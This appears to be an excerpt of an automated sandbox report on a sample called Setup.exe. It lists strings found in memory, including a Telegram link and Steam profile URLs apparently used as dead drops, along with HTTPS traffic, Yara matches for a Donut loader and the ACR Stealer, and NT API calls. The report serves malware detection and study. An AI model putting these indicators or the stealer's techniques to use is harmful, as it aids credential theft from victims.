Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/poin
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Setup.exe, Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sdfasdjr
Source: chrome.exe, 00000002.00000002.2943472168.00006204009F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000002.00000003.2538365885.0000620400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938279352.0000620400058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2538365885.0000620400343000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943690870.0000620400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=13:qhn-34GTDfyfgOG7DGb1WDYQ-Z0EsPDo-N1JFi
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000002.00000002.2941158355.00006204005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942681589.000062040081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945596285.0000620400E60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1914827899.0000620400DC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941934704.0000620400700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1920939536.0000620400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918800969.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000002.00000002.2942681589.000062040081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945596285.0000620400E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000002.00000002.2946630150.00006204012A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000002.00000002.2946630150.00006204012A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promosbb
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943173111.0000620400948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2946175447.0000620400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942568890.00006204007E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943173111.0000620400948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2946175447.0000620400FC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942568890.00006204007E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTg
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcn
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompe
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejgi
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943277729.0000620400974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemd
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/ee
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnk
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocnca
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkke
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabj
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkh
Source: chrome.exe, 00000002.00000002.2941158355.00006204005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943955796.0000620400B4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitb
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945979193.0000620400F40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000002.00000002.2944969889.0000620400D4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: chrome.exe, 00000002.00000003.1953329339.0000620401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953363743.00006204030B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950839594.00006204030C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953329339.0000620401050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953363743.00006204030B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950839594.00006204030C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943277729.0000620400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944411170.0000620400C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Setup.exe, 00000000.00000000.1676102546.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.innosetup.com/
Source: Setup.exe, 00000000.00000000.1676102546.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.remobjects.com/ps
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Setup.exe.2d523e4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.Setup.exe.2d523e4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.2.Setup.exe.2d523e4.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.Setup.exe.2d523e4.0.unpack, type: UNPACKEDPE	Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DF1927 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,	0_2_02DF1927
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D5280 NtCreateFile,GetProcessHeap,RtlAllocateHeap,NtReadFile,	0_2_031D5280
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B2A20 NtQueryAttributesFile,	0_2_031B2A20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C9F30 NtQuerySystemInformation,	0_2_031C9F30
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C9D60 NtQuerySystemInformation,	0_2_031C9D60

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50367	0_2_02D50367
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DF1927	0_2_02DF1927
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D89388	0_2_02D89388
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D77384	0_2_02D77384
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D64344	0_2_02D64344
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D71314	0_2_02D71314
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D56304	0_2_02D56304
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D50001	0_2_02D50001
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D721D7	0_2_02D721D7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DB91A4	0_2_02DB91A4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D53104	0_2_02D53104
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D5D774	0_2_02D5D774
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D77724	0_2_02D77724
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D7A4B4	0_2_02D7A4B4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D57454	0_2_02D57454
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D5B404	0_2_02D5B404
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D5A5C4	0_2_02D5A5C4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D535E4	0_2_02D535E4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D76594	0_2_02D76594
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D77AC4	0_2_02D77AC4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D76B54	0_2_02D76B54
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DA1B24	0_2_02DA1B24
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D568D4	0_2_02D568D4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D63864	0_2_02D63864
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D79864	0_2_02D79864
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DAC9ED	0_2_02DAC9ED
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D819E4	0_2_02D819E4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D64994	0_2_02D64994
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D77EE4	0_2_02D77EE4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D52E84	0_2_02D52E84
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D56EA4	0_2_02D56EA4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D86EA4	0_2_02D86EA4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D74E74	0_2_02D74E74
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DB2E77	0_2_02DB2E77
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D53F94	0_2_02D53F94
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D53F86	0_2_02D53F86
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D79FA4	0_2_02D79FA4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D72F77	0_2_02D72F77
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D76F64	0_2_02D76F64
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DA9C94	0_2_02DA9C94
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D83C64	0_2_02D83C64
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DA7C67	0_2_02DA7C67
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D7BD84	0_2_02D7BD84
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D7AD74	0_2_02D7AD74
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D7BD6A	0_2_02D7BD6A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B2080	0_2_031B2080
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A56C0	0_2_031A56C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D56C0	0_2_031D56C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C9590	0_2_031C9590
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031CA5A0	0_2_031CA5A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B2B60	0_2_031B2B60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031AE830	0_2_031AE830
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A9C20	0_2_031A9C20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F0340	0_2_031F0340
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C5370	0_2_031C5370
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031FB209	0_2_031FB209
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D0200	0_2_031D0200
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031CE240	0_2_031CE240
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C62E0	0_2_031C62E0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031CA120	0_2_031CA120
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031B31B0	0_2_031B31B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C8080	0_2_031C8080
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A50F0	0_2_031A50F0
